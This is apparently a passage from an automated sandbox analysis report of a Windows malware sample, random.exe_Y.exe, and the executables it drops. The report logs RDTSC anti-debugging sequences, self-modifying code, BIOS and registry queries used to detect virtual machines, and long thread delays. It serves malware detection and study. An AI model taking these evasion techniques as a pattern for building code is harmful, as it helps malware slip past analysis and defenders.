                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4C00834 second address: 4C0083A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0AF8 second address: 4BF0B16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3458CA514Fh 0x00000008 mov ah, 17h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0B16 second address: 4BF0B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0B1A second address: 4BF0B36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0924 second address: 4BF092A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B90179 second address: 4B901B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3458CA5157h 0x00000009 sbb esi, 3C3581BEh 0x0000000f jmp 00007F3458CA5159h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B901B6 second address: 4B901E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F3458756CACh 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007F3458756CB1h 0x00000014 mov di, ax 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0D03 second address: 4BF0D1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 284FAF22h 0x00000008 mov esi, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ecx, 1F106859h 0x00000016 popad 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0D1A second address: 4BF0D34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3458756CB5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0D34 second address: 4BF0D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007F3458CA514Ch 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov ebx, eax 0x00000014 mov ah, 30h 0x00000016 popad 0x00000017 push dword ptr [ebp+0Ch] 0x0000001a jmp 00007F3458CA5155h 0x0000001f push dword ptr [ebp+08h] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ecx, ebx 0x00000027 jmp 00007F3458CA514Fh 0x0000002c popad 0x0000002d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0D82 second address: 4BF0D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0D88 second address: 4BF0D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0D8C second address: 4BF0D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0D90 second address: 4BF0E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F3458CA5149h 0x0000000d jmp 00007F3458CA5157h 0x00000012 push eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F3458CA514Fh 0x0000001a or cx, 7E4Eh 0x0000001f jmp 00007F3458CA5159h 0x00000024 popfd 0x00000025 jmp 00007F3458CA5150h 0x0000002a popad 0x0000002b mov eax, dword ptr [esp+04h] 0x0000002f pushad 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F3458CA5157h 0x00000037 jmp 00007F3458CA5153h 0x0000003c popfd 0x0000003d jmp 00007F3458CA5158h 0x00000042 popad 0x00000043 mov si, 6D21h 0x00000047 popad 0x00000048 mov eax, dword ptr [eax] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0E51 second address: 4BF0E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, ch 0x00000006 popad 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0E58 second address: 4BF0E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0E5E second address: 4BF0E7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movzx eax, di 0x00000015 mov dh, 82h 0x00000017 popad 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0EB5 second address: 4BF0EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0EB9 second address: 4BF0EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BF0EBF second address: 4BF0EFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c jmp 00007F3458CA5150h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3458CA5157h 0x00000019 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA066E second address: 4BA068D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3458756CAAh 0x0000000a and cl, 00000008h 0x0000000d jmp 00007F3458756CABh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA068D second address: 4BA06B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA06B1 second address: 4BA06B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA06B5 second address: 4BA06BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA06BB second address: 4BA06D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458756CB1h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA06D0 second address: 4BA0731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F3458CA5153h 0x00000016 and ax, 1CBEh 0x0000001b jmp 00007F3458CA5159h 0x00000020 popfd 0x00000021 call 00007F3458CA5150h 0x00000026 pop eax 0x00000027 popad 0x00000028 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0731 second address: 4BA0754 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3458756CAEh 0x00000009 or ah, FFFFFFE8h 0x0000000c jmp 00007F3458756CABh 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0754 second address: 4BA0839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push FFFFFFFEh 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F3458CA5151h 0x00000010 xor eax, 60516306h 0x00000016 jmp 00007F3458CA5151h 0x0000001b popfd 0x0000001c popad 0x0000001d push 51F762C7h 0x00000022 pushad 0x00000023 mov edi, 72277890h 0x00000028 mov ecx, edx 0x0000002a popad 0x0000002b add dword ptr [esp], 254A5D51h 0x00000032 jmp 00007F3458CA514Bh 0x00000037 push 06026CF9h 0x0000003c pushad 0x0000003d jmp 00007F3458CA5150h 0x00000042 popad 0x00000043 xor dword ptr [esp], 713AC2F9h 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007F3458CA514Eh 0x00000051 sbb si, B738h 0x00000056 jmp 00007F3458CA514Bh 0x0000005b popfd 0x0000005c jmp 00007F3458CA5158h 0x00000061 popad 0x00000062 mov eax, dword ptr fs:[00000000h] 0x00000068 jmp 00007F3458CA5150h 0x0000006d nop 0x0000006e jmp 00007F3458CA5150h 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F3458CA514Eh 0x0000007b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0839 second address: 4BA087F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov dx, cx 0x0000000e popad 0x0000000f sub esp, 1Ch 0x00000012 jmp 00007F3458756CADh 0x00000017 xchg eax, ebx 0x00000018 jmp 00007F3458756CAEh 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F3458756CADh 0x00000027 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA087F second address: 4BA0885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0885 second address: 4BA08A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3458756CAAh 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA08A4 second address: 4BA08A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA08A8 second address: 4BA08AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA08AE second address: 4BA08B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA08B4 second address: 4BA08B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA08B8 second address: 4BA08CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3458CA514Bh 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA08CE second address: 4BA091D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, 263ED369h 0x00000012 pushfd 0x00000013 jmp 00007F3458756CB6h 0x00000018 sbb si, CA38h 0x0000001d jmp 00007F3458756CABh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA091D second address: 4BA0923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0923 second address: 4BA0927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0927 second address: 4BA092B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA092B second address: 4BA0965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3458756CB8h 0x00000012 add si, 83C8h 0x00000017 jmp 00007F3458756CABh 0x0000001c popfd 0x0000001d mov di, ax 0x00000020 popad 0x00000021 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0965 second address: 4BA0979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458CA5150h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0979 second address: 4BA0991 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0991 second address: 4BA0995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0995 second address: 4BA0999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0999 second address: 4BA099F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSpecial instruction interceptor: First address: 10EB59 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSpecial instruction interceptor: First address: 2AC4CF instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSpecial instruction interceptor: First address: 2AC8E7 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSpecial instruction interceptor: First address: 2D5DFB instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSpecial instruction interceptor: First address: 2B5B46 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\random.exe_Y.exeSpecial instruction interceptor: First address: 33BAA3 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: BEEB59 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: D8C4CF instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: D8C8E7 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: DB5DFB instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: D95B46 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: E1BAA3 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeSpecial instruction interceptor: First address: 692984 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeSpecial instruction interceptor: First address: 69067E instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSpecial instruction interceptor: First address: 6AD9BC instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSpecial instruction interceptor: First address: 6AD909 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSpecial instruction interceptor: First address: 84EF83 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSpecial instruction interceptor: First address: 84F2A7 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSpecial instruction interceptor: First address: 6AB6DA instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeSpecial instruction interceptor: First address: 86248C instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                            Source: C:\Users\user\Desktop\random.exe_Y.exeCode function: 0_2_04BF0DA1 rdtsc 0_2_04BF0DA1
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1198Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1211Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1190Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1182Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4242
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4946
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5944
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 937
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1127
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 498
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeAPI coverage: 5.1 %
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2976Thread sleep time: -44022s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4600Thread sleep count: 1198 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4600Thread sleep time: -2397198s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 988Thread sleep count: 312 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 988Thread sleep time: -9360000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5920Thread sleep count: 1211 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5920Thread sleep time: -2423211s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 280Thread sleep count: 1190 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 280Thread sleep time: -2381190s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6432Thread sleep time: -180000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2444Thread sleep count: 1182 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2444Thread sleep time: -2365182s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep time: -4611686018427385s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6076Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6620Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4576Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe TID: 3984Thread sleep time: -60000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe TID: 3192Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe TID: 3360Thread sleep time: -38019s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe TID: 5692Thread sleep time: -36018s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe TID: 964Thread sleep time: -32016s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe TID: 3172Thread sleep time: -180000s >= -30000s
                            Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\random.exe_Y.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,8_2_0040367D
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeCode function: 8_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,8_2_004031DC
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00797978 FindFirstFileW,FindFirstFileW,free,12_2_00797978
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_0079881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,12_2_0079881C
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_0079B5E0 GetSystemInfo,12_2_0079B5E0
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
